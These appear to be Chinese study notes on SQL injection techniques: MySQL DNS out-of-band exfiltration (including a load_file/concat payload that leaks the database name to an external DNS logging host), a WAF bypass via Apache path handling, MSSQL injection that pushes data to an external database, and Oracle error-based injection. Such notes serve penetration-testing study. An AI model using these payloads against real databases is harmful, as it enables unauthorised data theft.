数据库注入
1.Mysql 注入-Dns 注入
注入没有回显:
DNS 注入-》让盲注变成显错注入
Load_File()读取文件
UNC路径
windows SMB 服务(共享文件)//desktop/529 SMB 服务因为他是请求共享文件 所以会发起数据包 load_File()支持unc路径
DNS日志: 记录某时某分谁请求我查某域名
搭建一个DNS服务器来承接域名解析,所有访问域名都会被记录
域名本身运营商解析,修改域名设置方法,强行执行某个IP去解析域名
DNS注入平台
dnslog.cn
select load_file(concat('//',database(),'.地址'))
obb 数据外带
1.目标得有网络
2.SMB服务 windows 自带,linux 不自带 即DNS注入不适用于linux
waf:不会检测txt jpg 后缀不会检测因为安全
web 容器特性
apache 他会对index.php/1.txt 请求的文件不存在会自动请求前一个,
into outfile
into dumpfile
2.MSSQL注入- 反弹注入
SQL SERVER
反弹注入
攻击者-》目标服务器(SQL 注入)
目标服务器(执行一个查询)-》插入到一个外部数据库
条件:
1.有sql注入 漏洞
2.有外部数据库 公网ip
sysobjects=> mssql特有的查询所有表 xytpe代表类型
3.oracle注入-报错注入
oracle讲究语法 dual 虚表
select字段 from 表名
oracle 库被弱化 用户被强化 一个用户代表一个库
oracle 实现limit功能
1.采用不等于法
2.别名法